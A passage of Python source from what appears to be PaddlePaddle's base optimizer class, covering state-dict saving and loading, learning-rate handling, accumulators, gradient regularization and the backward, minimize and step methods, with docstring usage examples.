Examples:
.. code-block:: python
import paddle
emb = paddle.nn.Embedding(10, 10)
adam = paddle.optimizer.Adam(0.001, parameters=emb.parameters())
state_dict = adam.state_dict()
'''
state_dict = {}
for k, v in self._accumulators.items():
for para_name, var_tmp in v.items():
state_dict[var_tmp.name] = var_tmp
# if has master weight and then save master weight
if hasattr(self, "_master_weights"):
if len(self._master_weights) != 0:
state_dict["master_weights"] = self._master_weights
# global step if use lr decay
if isinstance(self._learning_rate, LRScheduler):
state_dict["LR_Scheduler"] = self._learning_rate.state_dict()
return state_dict
@framework.dygraph_only
def set_state_dict(self, state_dict):
'''
Load optimizer state dict. For Adam optimizer, contains beta1, beta2, momentum etc. If LRScheduler have been used, global_step will be changed.
Args:
state_dict(dict) : Dict contains all the Tensor needed by optimizer
Return:
None
Examples:
.. code-block:: python
import paddle
emb = paddle.nn.Embedding(10, 10)
layer_state_dict = emb.state_dict()
paddle.save(layer_state_dict, "emb.pdparams")
scheduler = paddle.optimizer.lr.NoamDecay(
d_model=0.01, warmup_steps=100, verbose=True)
adam = paddle.optimizer.Adam(
learning_rate=scheduler,
parameters=emb.parameters())
opt_state_dict = adam.state_dict()
paddle.save(opt_state_dict, "adam.pdopt")
opti_state_dict = paddle.load("adam.pdopt")
adam.set_state_dict(opti_state_dict)
'''
if isinstance(self._learning_rate, LRScheduler):
self._learning_rate.set_state_dict(state_dict["LR_Scheduler"])
# NOTE: exclude learning rate scheduler's state from
# _accumulators_holder.
state_dict = state_dict.copy()
if "LR_Scheduler" in state_dict:
state_dict.pop("LR_Scheduler")
if "master_weights" in state_dict:
if hasattr(self, "_master_weights"):
self._master_weights = state_dict["master_weights"]
state_dict.pop("master_weights")
self._accumulators_holder = state_dict
for k, v in self._accumulators.items():
for para_name, var_tmp in v.items():
assert (
var_tmp.name in state_dict
), f"optimizer Tensor {var_tmp.name} not found"
var = var_tmp.value()
tensor = var.get_tensor()
model_np = np.array(tensor)
load_para = state_dict[var_tmp.name]
if isinstance(load_para, Variable):
load_para_np = np.array(load_para)
elif isinstance(load_para, core.eager.Tensor):
load_para_np = np.array(load_para)
elif isinstance(load_para, np.ndarray):
load_para_np = load_para
else:
raise RuntimeError(
"State dict type {} not supprt".format(
str(type(load_para))
)
)
assert (
model_np.shape == load_para_np.shape
), "Parameter shape not match, Dygraph Parameter [ {} ] need tensor with shape {} but load tensor with shape {}".format(
model_np.name, model_np.shape, load_para_np.shape
)
assert (
model_np.dtype == load_para_np.dtype
), "Parameter dtype not match, Dygraph Parameter [ {} ] need tensor with dtype {} but load tensor with dtype {}".format(
model_np.name, model_np.dtype, load_para_np.dtype
)
tensor.set(load_para_np, framework._current_expected_place())
def get_opti_var_name_list(self):
return self._opti_name_list
def _create_global_learning_rate(self):
def do_create():
# lr var can't be float16 or bfloat16, for pure fp16 or bf16 training, should extra handle the dtype for lr
_lr_dtype = (
paddle.get_default_dtype()
if self._dtype is None
else self._dtype
)
_lr_dtype = (
paddle.float32
if (
(
paddle.get_default_dtype() != "float16"
and _lr_dtype == paddle.float16
)
or (
paddle.get_default_dtype() != "bfloat16"
and _lr_dtype == paddle.bfloat16
)
)
else _lr_dtype
)
if isinstance(self._learning_rate, LRScheduler):
lr_var = self._global_learning_rate()
# only create global lr_var once
if not isinstance(lr_var, framework.Variable):
lr_name = unique_name.generate('learning_rate')
self._learning_rate._var_name = lr_name
lr_var = self.helper.create_global_variable(
name=lr_name,
shape=[],
persistable=True,
stop_gradient=True,
dtype=_lr_dtype,
)
main_prog = framework.default_main_program()
main_prog.lr_scheduler = self._learning_rate
main_prog.lr_var = lr_var
self._learning_rate_map[
framework.default_main_program()
] = lr_var
lr_value = float(self._learning_rate())
self.helper.set_variable_initializer(
lr_var,
initializer=paddle.nn.initializer.Constant(value=lr_value),
)
elif isinstance(self._learning_rate, float):
# only create global lr_var once
lr = self._global_learning_rate()
if isinstance(lr, framework.Variable):
return
else:
self._learning_rate_map[
framework.default_main_program()
] = paddle.static.create_global_var(
name=unique_name.generate("learning_rate"),
shape=[],
value=float(self._learning_rate),
dtype=_lr_dtype,
persistable=True,
)
with paddle.fluid.framework.dygraph_guard_if_declarative():
do_create()
@framework.dygraph_only
def set_lr(self, value):
"""
:api_attr: imperative
Set the value of the learning rate manually in the optimizer. If the optimizer use LRScheduler,
this API cannot be invoked, because it will lead to conflict.
Args:
value (float): the value of learning rate
Returns:
None
Examples:
.. code-block:: python
import paddle
linear = paddle.nn.Linear(10, 10)
adam = paddle.optimizer.Adam(0.1, parameters=linear.parameters())
# set learning rate manually by python float value
lr_list = [0.2, 0.3, 0.4, 0.5, 0.6]
for i in range(5):
adam.set_lr(lr_list[i])
lr = adam.get_lr()
print("current lr is {}".format(lr))
# Print:
# current lr is 0.2
# current lr is 0.3
# current lr is 0.4
# current lr is 0.5
# current lr is 0.6
"""
if not isinstance(value, (int, float)):
raise TypeError(
"The type of 'value' in optimizer.set_lr must be float, but received %s."
% (type(value))
)
if isinstance(self._learning_rate, LRScheduler):
raise RuntimeError(
"optimizer's learning rate can't be LRScheduler when invoke this API, because this will lead to conflict."
)
self._learning_rate = float(value)
current_lr = self._global_learning_rate()
if current_lr is not None:
if in_dygraph_mode():
place = _current_expected_place()
_C_ops.full_(
current_lr,
list(current_lr.shape),
float(value),
current_lr.dtype,
place,
)
else:
global_block = framework.default_main_program().global_block()
global_block.append_op(
type='fill_constant',
outputs={'Out': [current_lr]},
attrs={
'dtype': current_lr.dtype,
'shape': list(current_lr.shape),
'value': float(value),
},
stop_gradient=True,
)
def get_lr(self):
"""
Get current learning rate of optimizer.
If 'LRScheduler' is not used, the return value is all the same.
If 'LRScheduler' is used, the return value is the current scheduled learing rete.
Returns:
float: The current learning rate of optimizer.
Examples:
.. code-block:: python
# train on default dynamic graph mode
import paddle
import numpy as np
emb = paddle.nn.Embedding(10, 3)
## example1: LRScheduler is not used, return the same value is all the same
adam = paddle.optimizer.Adam(0.01, parameters = emb.parameters())
for batch in range(10):
input = paddle.randint(low=0, high=5, shape=[5])
out = emb(input)
out.backward()
print("Learning rate of step{}: {}".format(batch, adam.get_lr())) # 0.01
adam.step()
## example2: StepDecay is used, return the scheduled learning rate
scheduler = paddle.optimizer.lr.StepDecay(learning_rate=0.5, step_size=2, gamma=0.1)
adam = paddle.optimizer.Adam(scheduler, parameters = emb.parameters())
for batch in range(10):
input = paddle.randint(low=0, high=5, shape=[5])
out = emb(input)
out.backward()
print("Learning rate of step{}: {}".format(batch, adam.get_lr())) # 0.5->0.05...
adam.step()
scheduler.step()
# train on static graph mode
paddle.enable_static()
main_prog = paddle.static.Program()
start_prog = paddle.static.Program()
with paddle.static.program_guard(main_prog, start_prog):
x = paddle.static.data(name='x', shape=[None, 10])
z = paddle.static.nn.fc(x, 100)
loss = paddle.mean(z)
scheduler = paddle.optimizer.lr.StepDecay(learning_rate=0.5, step_size=2, gamma=0.1)
adam = paddle.optimizer.Adam(learning_rate=scheduler)
adam.minimize(loss)
exe = paddle.static.Executor()
exe.run(start_prog)
for batch in range(10):
print("Learning rate of step{}: {}", adam.get_lr()) # 0.5->0.05->0.005...
out = exe.run(main_prog, feed={'x': np.random.randn(3, 10).astype('float32')})
scheduler.step()
"""
if isinstance(self._learning_rate, float):
return self._learning_rate
else:
return self._learning_rate()
def _global_learning_rate(self, program=None):
"""
get global decayed learning rate
:return:
"""
if program is None:
program = framework.default_main_program()
return self._learning_rate_map.get(program, None)
def _append_optimize_op(self, block, param_and_grad):
"""append optimize operator to block and return all the added optimize_op"""
raise NotImplementedError(
"Class \"Optimizer\" connot be used directly as an optimizer, please use its subclasses such as \"Adam\""
)
def _create_param_lr(self, param_and_grad):
# create learning rate tensor for every parameter
param = param_and_grad[0]
if hasattr(param, 'optimize_attr'):
param_lr = param.optimize_attr['learning_rate']
if type(param_lr) == Variable:
return param_lr
else:
if param_lr == 1.0:
return self._global_learning_rate()
else:
with default_main_program()._lr_schedule_guard(
is_with_opt=True
), framework.name_scope('scale_with_param_lr'):
return self._global_learning_rate() * param_lr
else:
return self._global_learning_rate()
def _create_master_weight(self, param):
if param.name in self._master_weights:
var = self._master_weights[param.name]
else:
assert isinstance(self.helper, LayerHelper)
var_name = param.name + "_fp32_master"
var_name = unique_name.generate(var_name)
var = paddle.static.create_global_var(
name=var_name,
shape=param.shape,
value=0,
dtype='float32',
persistable=True,
)
block = self.helper.startup_program.global_block()
block.append_op(
type="cast",
inputs={"X": [param]},
outputs={"Out": [var]},
attrs={
"in_dtype": param.dtype,
"out_dtype": core.VarDesc.VarType.FP32,
},
)
self._master_weights[param.name] = var
return var
def _create_master_grad(self, grad):
assert self._is_dtype_fp16_or_bf16(grad.dtype)
if grad.name in self._master_grads:
var = self._master_grads[grad.name]
else:
var_name = grad.name + "_fp32_master"
var_name = unique_name.generate(var_name)
var = grad.block.create_var(
name=var_name,
shape=grad.shape,
value=0,
dtype='float32',
lod_level=grad.lod_level,
persistable=grad.persistable,
is_data=grad.is_data,
)
self._master_grads[grad.name] = var
return var
def _create_accumulators(self, block, parameters):
"""Create all accumulators needed by the parameters
Args:
block: the block in which the loss tensor is present
parameters: list of parameter tensors for the optimizer
"""
pass
def _finish_update(self, block, parameters_and_grads):
"""Finish any custom updates needed
before completing an optimization step
Args:
block: the block in which the loss tensor is present
parameters: list of parameter tensors for the optimizer
Returns:
None
"""
pass
def _add_accumulator(
self,
name,
param,
dtype=None,
fill_value=0.0,
shape=None,
type=None,
device=None,
):
"""Utility function to add an accumulator for a parameter
Args:
block: the block in which the loss tensor is present
name: name of the accumulator
param: parameter tensor for which accumulator is to be added
dtype: data type of the accumulator tensor
fill_value: value to initialize the accumulator tensor
"""
if self._name is not None:
name = self._name + "_" + name
if (
name in self._accumulators
and param.name in self._accumulators[name]
):
if framework.in_dygraph_mode():
return self._accumulators[name][param.name]
raise Exception(
"Accumulator {} already exists for parameter {}".format(
name, param.name
)
)
if shape is None:
shape = param.shape
assert isinstance(self.helper, LayerHelper)
var_name = param.name + "_" + name
var_name = unique_name.generate(var_name)
self._opti_name_list.append(var_name)
var = self.helper.create_global_variable(
name=var_name,
persistable=True,
dtype=dtype or param.dtype,
type=core.VarDesc.VarType.LOD_TENSOR,
shape=shape,
belong_to_optimizer=True,
)
if device is None:
device = self._get_device_for_param(param.name)
if (
in_dygraph_mode()
and (device == 'cpu' or isinstance(device, core.CPUPlace))
and (not core.is_compiled_with_xpu())
):
_C_ops.full_(
var,
var.shape,
str(float(fill_value)),
var.dtype,
core.CPUPlace(),
)
else:
with device_guard(device):
self.helper.set_variable_initializer(
var,
initializer=paddle.nn.initializer.Constant(
value=float(fill_value)
),
)
if framework.in_dygraph_mode():
if len(self._accumulators_holder) > 0:
assert (
var_name in self._accumulators_holder
), "Optimizer set error, {} should in state dict".format(
var_name
)
var.set_value(self._accumulators_holder.pop(var_name))
self._accumulators[name][param.name] = var
return var
def _get_accumulator(self, name, param):
"""Utility function to fetch an accumulator for a parameter
Args:
name: name of the accumulator
param: parameter tensor for which accumulator is to be fetched
Returns:
accumulator tensor for the parameter
"""
if self._name is not None:
name = self._name + "_" + name
if (
name not in self._accumulators
or param.name not in self._accumulators[name]
):
raise Exception(
"Accumulator {} does not exist for parameter {}".format(
name, param.name
)
)
return self._accumulators[name][param.name]
def _get_accumulator_master(self, name, param):
"""Utility function to fetch an accumulator for a parameter
Args:
name: name of the accumulator
param: parameter variable for which accumulator is to be fetched
Returns:
accumulator variable for the parameter
"""
if self._name is not None:
name = self._name + "_" + name
find_master = self._multi_precision and self._is_dtype_fp16_or_bf16(
param.dtype
)
target_param = (
self._master_weights[param.name] if find_master else param
)
target_name = target_param.name
if (
name not in self._accumulators
or target_name not in self._accumulators[name]
):
raise Exception(
"Accumulator {} does not exist for parameter {}".format(
name, target_name
)
)
return self._accumulators[name][target_name]
def _update_param_device_map(self, parameters_and_grads, target_block):
for param_and_grad in parameters_and_grads:
if param_and_grad[0].stop_gradient is False:
param_name = param_and_grad[0].name
ops = target_block.ops
device_attr_name = (
core.op_proto_and_checker_maker.kOpDeviceAttrName()
)
for op in ops:
input_arg_names = op.input_arg_names
if param_name in input_arg_names:
self._param_device_map[param_name] = op.attr(
device_attr_name
)
break
def _get_device_for_param(self, param_name):
device = None
if param_name in self._param_device_map:
device = self._param_device_map[param_name]
return device
def _create_optimization_pass(
self, parameters_and_grads, param_group_idx=0
):
"""Add optimization operators to update gradients to tensors.
Args:
parameters_and_grads(list(tuple(Tensor, Tensor))):
a list of (tensor, gradient) pair to update.
Returns:
return_op_list: a list of operators that will complete one step of
optimization. This will include parameter update ops, global step
update ops and any other custom ops required by subclasses to manage
their internal state.
"""
# This is a default implementation of create_optimization_pass that
# can be shared by most optimizers. This implementation assumes that
# the subclass will implement the _append_optimize_op method and the
# _initialize_tensors method. The subclass can extend the
# _create_accumulators method if it needs to create accumulators
# for parameters and extend _finish_update method to add custom ops.
# Allways called under program_guard use global block as loss block
# But if current block is in control flow, append optimize op in the
# grad block of current block
global_block = framework.default_main_program().global_block()
target_block = global_block
current_block = framework.default_main_program().current_block()
if current_block.idx != global_block.idx:
assert (
current_block.backward_block_idx != -1
), "current block is not global_block, but it doesn't have backward block."
target_block = framework.default_main_program().blocks[
current_block.backward_block_idx
]
start = len(target_block.ops)
self.helper = LayerHelper(self.__class__.__name__)
self._create_global_learning_rate()
# NOTE: Multi Tensor support [ Momentum, Adam ] for dygraph mode
if self._use_multi_tensor and self.__class__.__name__ in [
'Momentum',
'Adam',
]:
if (
len(self._param_dict['FP32_LODTensor'][param_group_idx]) == 0
and len(self._param_dict['FP16_LODTensor'][param_group_idx])
== 0
):
if isinstance(parameters_and_grads, list):
assert param_group_idx == 0
self._multi_tensor_init(
target_block,
[
p[0]
for p in parameters_and_grads
if not p[0].stop_gradient
],
param_group_idx,
)
else:
self._update_param_group(parameters_and_grads)
self._multi_tensor_init(
target_block,
[
p[0]
for p in parameters_and_grads['params']
if not p[0].stop_gradient
],
param_group_idx,
)
if framework.in_dygraph_mode():
self._append_optimize_multi_tensor_op(
target_block,
parameters_and_grads,
param_group_idx=param_group_idx,
)
else:
self._update_param_device_map(
parameters_and_grads, target_block
)
# NOTE: Multi Tensor requires all parameters to be in the same device and program.
# param_grad_list = [p_0,g_0,p_1,g_1,....]
param_grad_list = []
for param_and_grad in parameters_and_grads:
if (
not param_and_grad[0].stop_gradient
and param_and_grad[1] is not None
):
param_grad_list.append(param_and_grad[0])
param_grad_list.append(param_and_grad[1])
with param_grad_list[0].block.program._optimized_guard(
param_grad_list
), name_scope("optimizer"):
device = self._get_device_for_param(param_grad_list[0].name)
with device_guard(device):
self._append_optimize_multi_tensor_op(
target_block,
parameters_and_grads,
param_group_idx=param_group_idx,
)
else:
if not framework.in_dygraph_mode():
params_grads_device_map = (
parameters_and_grads['params']
if isinstance(parameters_and_grads, dict)
else parameters_and_grads
)
self._update_param_device_map(
params_grads_device_map, target_block
)
if isinstance(parameters_and_grads, list):
with paddle.fluid.framework.dygraph_guard_if_declarative():
self._create_accumulators(
target_block,
[
p[0]
for p in parameters_and_grads
if not p[0].stop_gradient
],
)
else:
params_acc_dict = parameters_and_grads.copy()
params_acc_dict['params'] = [
p[0]
for p in params_acc_dict['params']
if not p[0].stop_gradient
]
with paddle.fluid.framework.dygraph_guard_if_declarative():
self._create_accumulators(target_block, params_acc_dict)
if framework.in_dygraph_mode():
found_inf = self._get_auxiliary_var('found_inf')
if found_inf:
if isinstance(found_inf, core.eager.Tensor):
self._set_auxiliary_var('found_inf', True)
else:
if isinstance(found_inf, core.eager.Tensor):
self._set_auxiliary_var('found_inf', False)
if isinstance(parameters_and_grads, list):
for param_and_grad in parameters_and_grads:
if param_and_grad[1] is None:
continue
if param_and_grad[0].stop_gradient is False:
self._append_optimize_op(
target_block, param_and_grad
)
else:
for param_and_grad in parameters_and_grads['params']:
if param_and_grad[1] is None:
continue
if param_and_grad[0].stop_gradient is False:
param_grad_dict = {}
param_grad_dict['params'] = param_and_grad
param_grad_dict.update(
{
k: v
for k, v in parameters_and_grads.items()
if k != 'params'
}
)
self._append_optimize_op(
target_block, param_grad_dict
)
else:
for param_and_grad in parameters_and_grads:
if param_and_grad[1] is None:
continue
with param_and_grad[0].block.program._optimized_guard(
param_and_grad
), name_scope("optimizer"):
if param_and_grad[0].stop_gradient is False:
device = self._get_device_for_param(
param_and_grad[0].name
)
with device_guard(device):
optimize_op = self._append_optimize_op(
target_block, param_and_grad
)
# Get custom finish ops for subclasses
# FIXME: Need to fix this once we figure out how to handle dependencies
self._finish_update(target_block, parameters_and_grads)
end = len(target_block.ops)
return target_block._slice_ops(start, end)
def _append_dgc_ops(self, param_and_grad):
pass
def backward(
self,
loss,
startup_program=None,
parameters=None,
no_grad_set=None,
callbacks=None,
):
"""
The first part of ``minimize``, do auto-diff to append backward operations for
the current program.
Args:
loss (Tensor): ``loss`` tensor to run optimizations.
startup_program (Program, optional): :ref:`api_fluid_Program` for
initializing parameters in ``parameters``. The default value
is None, at this time :ref:`api_fluid_default_startup_program` will be used.
parameters (list, optional): List of ``Tensor`` or ``Tensor.name`` to update
to minimize ``loss``. The default value is None, at this time all parameters
will be updated.
no_grad_set (set, optional): Set of ``Tensor`` or ``Tensor.name`` that don't need
to be updated. The default value is None.
callbacks (list, optional): list of callable objects to run when appending backward
operator for one parameter. The default value is None.
Return:
list: list of (param, grad) tensor pairs, param is ``Parameter``,
grad is the gradient value corresponding to the parameter.
Examples:
.. code-block:: python
import paddle
x = paddle.arange(26, dtype="float32").reshape([2, 13])
linear = paddle.nn.Linear(13, 5)
# This can be any optimizer supported by dygraph.
adam = paddle.optimizer.Adam(learning_rate = 0.01,
parameters = linear.parameters())
out = linear(x)
out.backward()
adam.step()
adam.clear_grad()
"""
act_no_grad_set = None
if framework.in_dygraph_mode():
pass
else:
act_no_grad_set = self._get_no_grad_set(loss, no_grad_set)
# Infer dtype by loss if None
if self._dtype is None:
self._dtype = loss.dtype
if framework.in_dygraph_mode():
parameter_list = parameters if parameters else self._parameter_list
# It is very time-consuming to call c++ functions in a loop on the python side.
# We put this part of the code on the c++ side to improve the speed in eager mode.
params_grads = []
grads = core.eager.get_all_grads(parameter_list)
for index, grad in enumerate(grads):
if grad is not None:
params_grads.append((parameter_list[index], grad))
else:
if callbacks is None:
callbacks = [paddle.nn.clip.error_clip_callback]
else:
assert isinstance(callbacks, list)
program = loss.block.program
assert np.prod(loss.shape) == 1, (
"The number of elements of loss should be 1, but the current loss.shape is {}, whose number of elements is not 1. "
"Maybe that you should call paddle.mean to process the current loss.".format(
loss.shape
)
)
parameter_list = parameters if parameters else self._parameter_list
with program_guard(program, startup_program):
from paddle.incubate.autograd.utils import prim_enabled
if prim_enabled():
params_grads = append_backward_new(
[loss], parameter_list, act_no_grad_set, callbacks
)
else:
params_grads = append_backward(
loss, parameter_list, act_no_grad_set, callbacks
)
# Note: since we can't use all_reduce_op now,
# dgc_op should be the last op of one grad.
self._append_dgc_ops(params_grads)
return params_grads
def apply_gradients(self, params_grads):
"""
Second part of `minimize`, appending optimization operators for
given `params_grads` pairs.
Args:
params_grads (list): list of (param, grad) pair to do optimization.
Returns:
list: A list of operators appended to the current program.
Examples:
.. code-block:: python
import paddle
inp = paddle.uniform([10, 10], dtype="float32", min=-0.1, max=0.1)
linear = paddle.nn.Linear(10, 10)
out = linear(inp)
loss = paddle.mean(out)
optimizer = paddle.optimizer.Adam(learning_rate=0.1,
parameters=linear.parameters())
params_grads = optimizer.backward(loss)
optimizer.apply_gradients(params_grads)
"""
params_grads = sorted(params_grads, key=lambda x: x[0].name)
# 'optimizer(grad_clip)' or 'set_gradient_clip'
if self._grad_clip is not None:
params_grads = self._grad_clip(params_grads)
else:
params_grads = paddle.nn.clip.append_gradient_clip_ops(params_grads)
# Add regularization if any
params_grads = self.append_regularization_ops(
params_grads, self.regularization
)
optimize_ops = self._create_optimization_pass(params_grads)
return optimize_ops
def _apply_optimize(
self, loss, startup_program, params_grads, param_group_idx=0
):
"""
Second part of `minimize`, appending optimization operators for
given `params_grads` pairs.
Args:
loss (Tensor): loss tensor to run optimizations.
startup_program (Program): startup_program for initializing parameters
in `parameters`.
params_grads (list): list of (param, grad) pair to do optimization.
Returns:
list: A list of operators appended to the current program.
"""
if framework.in_dygraph_mode():
with program_guard(
framework.default_main_program(),
framework.default_startup_program(),
):
if isinstance(params_grads, list):
if self._grad_clip is not None:
params_grads = self._grad_clip(params_grads)
params_grads = self.append_regularization_ops(
params_grads, self.regularization
)
else:
grad_clip = params_grads['grad_clip']
if grad_clip is not None:
params_grads['params'] = grad_clip(
params_grads['params']
)
params_grads['params'] = self.append_regularization_ops(
params_grads['params'], self.regularization
)
optimize_ops = self._create_optimization_pass(
params_grads, param_group_idx=param_group_idx
)
else:
assert param_group_idx == 0
program = loss.block.program
with program_guard(program, startup_program):
optimize_ops = self.apply_gradients(params_grads)
return optimize_ops
def _create_regularization_of_grad(self, param, grad, regularization=None):
"""Create and add backward regularization Operators
Function helper of append_regularization_ops.
"""
# If no gradient or no regularization is specified, then we don't need to do anything
if grad is None or (
(
not hasattr(param, 'regularizer')
or (hasattr(param, 'regularizer') and param.regularizer is None)
)
and regularization is None
):
return grad
regularization_term = None
# when master_grad is true in amp training, grad will be fp32, but param maybe fp16.
# we get master weight when master_grad is true to avoid type mismatch error.
def get_target_param(param, grad):
target_param = param
if param.dtype != grad.dtype:
find_master = (
self._multi_precision
and self._is_dtype_fp16_or_bf16(param.dtype)
)
if find_master and len(self._master_weights) != 0:
target_param = self._master_weights[param.name]
else:
target_param = param.astype(grad.dtype)
return target_param
param = get_target_param(param, grad)
if hasattr(param, 'regularizer') and param.regularizer is not None:
# Add variable for regularization term in grad block
regularization_term = param.regularizer(param, grad, grad.block)
elif regularization is not None:
regularization_term = regularization(param, grad, grad.block)
assert regularization_term is not None
if framework.in_dygraph_mode():
return _C_ops.add_n([grad, regularization_term])
else:
new_grad = grad
if grad.type == core.VarDesc.VarType.SELECTED_ROWS:
# FIXME(zcd): If the grad is SELECTED_ROWS, after regularization,
# the grad's type and name will be changed. But the gradient's name
# is used in ParallelExecutor Reduce mode, so I add a flag for
# the new_grad here.
new_grad = grad.block.create_var(
name=grad.name + core.kNewGradSuffix(),
dtype=param.dtype,
shape=param.shape,
lod_level=param.lod_level,
type=core.VarDesc.VarType.LOD_TENSOR,
)
inputs = {"X": [grad, regularization_term]}
outputs = {"Out": [new_grad]}
grad.block.append_op(type='sum', inputs=inputs, outputs=outputs)
return new_grad
def append_regularization_ops(
self, parameters_and_grads, regularization=None
):
r"""Create and add backward regularization Operators
Creates and adds backward regularization operators in the BlockDesc.
This will add gradients of the regularizer function to the gradients
of the parameters and return these modified gradients. This is the
same as implementing weight decay in optimizers for regularization.
Args:
parameters_and_grads: A list of (parameters, gradients) pairs
that need to be regularized.
regularization: A global regularizer. If the parameter is not
set. It will be applied with regularizer.
Returns:
list[(Variable, Variable)]: list of (parameters, gradients) \
pair with the regularized gradient
Raises:
Exception: Unknown regularization type
"""
params_and_grads = []
if framework.in_dygraph_mode():
for param, grad in parameters_and_grads:
new_grad = self._create_regularization_of_grad(
param, grad, regularization
)
params_and_grads.append((param, new_grad))
else:
repeate_regularizer = False
with framework.name_scope('regularization'):
for param, grad in parameters_and_grads:
if (
not repeate_regularizer
and param.regularizer is not None
and regularization is not None
):
repeate_regularizer = True
logging.info(
"If regularizer of a Parameter has been set by 'fluid.ParamAttr' or 'fluid.WeightNormParamAttr' already. "
"The Regularization[%s] in Optimizer will not take effect, and it will only be applied to other Parameters!"
% regularization.__str__()
)
with param.block.program._optimized_guard([param, grad]):
new_grad = self._create_regularization_of_grad(
param, grad, regularization
)
params_and_grads.append((param, new_grad))
return params_and_grads
def _get_no_grad_set(self, loss, no_grad_set=None):
no_grad_set = _get_no_grad_set_name(no_grad_set)
parameters = loss.block.program.global_block().all_parameters()
param_no_trainable = {
param.name for param in parameters if param.stop_gradient is True
}
# If the parameter is no trainable, it should not have a gradient.
no_grad_set.update(param_no_trainable)
return no_grad_set
@framework.non_static_only
def clear_grad(self, set_to_zero=True):
"""
Clear the gradients of all optimized parameters for model.
If not, new gradient will accumulat on previous gradient.
There are two method to clear grad: set_to_zero or delete grad.
Args:
set_to_zero (bool, optional): If set grads to zero or not, default is True.
Returns:
None
Examples:
.. code-block:: python
import paddle
a = paddle.arange(26, dtype="float32").reshape([2, 13])
linear = paddle.nn.Linear(13, 5)
# This can be any optimizer supported by dygraph.
adam = paddle.optimizer.Adam(learning_rate = 0.01,
parameters = linear.parameters())
out = linear(a)
out.backward()
adam.step()
adam.clear_grad()
"""
param_list = []
if self._parameter_list is None or not isinstance(
self._parameter_list[0], dict
):
for p in self._parameter_list:
if not p.stop_gradient:
param_list.append(p)
else:
for param_group in self._param_groups:
for p in param_group['params']:
if not p.stop_gradient:
param_list.append(p)
for p in param_list:
p.clear_gradient(set_to_zero)
@imperative_base.no_grad()
def minimize(
self, loss, startup_program=None, parameters=None, no_grad_set=None
):
"""
Add operations to minimize ``loss`` by updating ``parameters``.
Args:
loss (Tensor): A ``Tensor`` containing the value to minimize.
startup_program (Program, optional): :ref:`api_fluid_Program` for
initializing parameters in ``parameters``. The default value
is None, at this time :ref:`api_fluid_default_startup_program` will be used.
parameters (list, optional): List of ``Tensor`` or ``Tensor.name`` to update
to minimize ``loss``. The default value is None, at this time all parameters
will be updated.
no_grad_set (set, optional): Set of ``Tensor`` or ``Tensor.name`` that don't need
to be updated. The default value is None.
Returns:
tuple: tuple (optimize_ops, params_grads), A list of operators appended
by minimize and a list of (param, grad) tensor pairs, param is
``Parameter``, grad is the gradient value corresponding to the parameter.
In static graph mode, the returned tuple can be passed to ``fetch_list`` in ``Executor.run()`` to
indicate program pruning. If so, the program will be pruned by ``feed`` and
``fetch_list`` before run, see details in ``Executor``.
Examples:
.. code-block:: python
import paddle
linear = paddle.nn.Linear(10, 10)
input = paddle.uniform(shape=[10, 10], min=-0.1, max=0.1)
out = linear(input)
loss = paddle.mean(out)
beta1 = paddle.to_tensor([0.9], dtype="float32")
beta2 = paddle.to_tensor([0.99], dtype="float32")
adam = paddle.optimizer.Adam(learning_rate=0.1,
parameters=linear.parameters(),
weight_decay=0.01)
loss.backward()
adam.minimize(loss)
adam.clear_grad()
"""
assert isinstance(loss, Variable), "The loss should be an Tensor."
parameter_list = parameters if parameters else self._parameter_list
params_grads = self.backward(
loss,
startup_program=startup_program,
parameters=parameter_list,
no_grad_set=no_grad_set,
)
optimize_ops = self._apply_optimize(
loss, startup_program=startup_program, params_grads=params_grads
)
return optimize_ops, params_grads
def _declarative_step(self):
"""
In declarative mode, we forward `call step` to `call apply_gradients`
"""
params = (
paddle.static.default_main_program().global_block().all_parameters()
)
assert not isinstance(
self._parameter_list[0], dict
), "Only list of parameters is supported while using optimizer in @paddle.jit.static."
selected_params = {param.name for param in self._parameter_list}
parameters = [param for param in params if param.trainable]
parameters = list(
filter(
lambda x: x.name in selected_params and hasattr(x, "grad"),
parameters,
)
)
params_grads = [(param, param.grad) for param in parameters]
optimize_ops = self.apply_gradients(params_grads)
return
@imperative_base.no_grad()
@framework.non_static_only
def step(self):
"""
Execute the optimizer and update parameters once.
Returns:
None
Examples:
.. code-block:: python
import paddle
a = paddle.arange(26, dtype="float32").reshape([2, 13])
linear = paddle.nn.Linear(13, 5)
# This can be any optimizer supported by dygraph.
adam = paddle.optimizer.Adam(learning_rate = 0.01,
parameters = linear.parameters())
out = linear(a)
out.backward()
adam.step()
adam.clear_grad()
"""
if paddle.fluid.dygraph.base.in_declarative_mode():
self._declarative_step()
return
if not isinstance(self._param_groups[0], dict):
params_grads = []
for param in self._param_groups:
if param.stop_gradient:
continue
if param._grad_ivar() is not None:
grad_var = param._grad_ivar()
params_grads.append((param, grad_var))
self._apply_optimize(
loss=None,
startup_program=None,
params_grads=params_grads,
param_group_idx=0,
)
else:
# optimize parameters in groups
for idx, param_group in enumerate(self._param_groups):
params_grads = defaultdict(lambda: [])
for param in param_group['params']:
if param.stop_gradient:
continue
if param._grad_ivar() is not None:
grad_var = param._grad_ivar()
params_grads['params'].append((param, grad_var))
params_grads.update(
{k: v for k, v in param_group.items() if k != 'params'}
)
self._apply_optimize(
loss=None,
startup_program=None,
params_grads=params_grads,
param_group_idx=idx,
)
def _add_param_group(self, param_group):
"""
Add a param group to parameter_list.
Args:
param_group (dict): The group of Tensors to be optimzed with
different optimization options.
"""
params = param_group['params']
if isinstance(params, Parameter):
param_group['params'] = [params]
elif isinstance(params, set):
raise TypeError(
"optimizer parameters should be in ordered collections,"
"but received set, please use list instead."
)
else:
param_group['params'] = list(params)
# Update optimization options for each groups
for k, v in self._default_dict.items():
param_group.setdefault(k, v)
param_set = set()
for group in self._param_groups:
param_set.update(set(group['params']))
if not param_set.isdisjoint(set(param_group['params'])):
raise ValueError(
"some parameters appear in more than one parameter group"
)
for param in param_group['params']:
weight_decay = param_group['weight_decay']
if isinstance(weight_decay, float):
regularization = L2Decay(weight_decay)
else:
regularization = weight_decay
param.regularizer = regularization
param.optimize_attr['learning_rate'] = param_group.get(
'learning_rate', 1.0
)
self._param_groups.append(param_group)
def _update_param_group(self, parameters):
"""
Update the param group with new entry
Args:
parameters (dict): The extra group of Tensors to be optimzed with
different optimization options. Only used in child class.
"""
pass
@framework.dygraph_only
def _multi_tensor_init(self, target_block, parameters, param_group_idx):
"""
All parameters used for optimizer (such as: parameters, master_weight, velocity_acc for momentum) calculations are grouped into a python list by data type (float16, float32).
This function will be overridden in the corresponding optimizer file.
Args:
target_block: the block in which the loss tensor is present
parameters: list of parameter tensors for the optimizer
"""
pass
@framework.dygraph_only
def _append_optimize_multi_tensor_op(
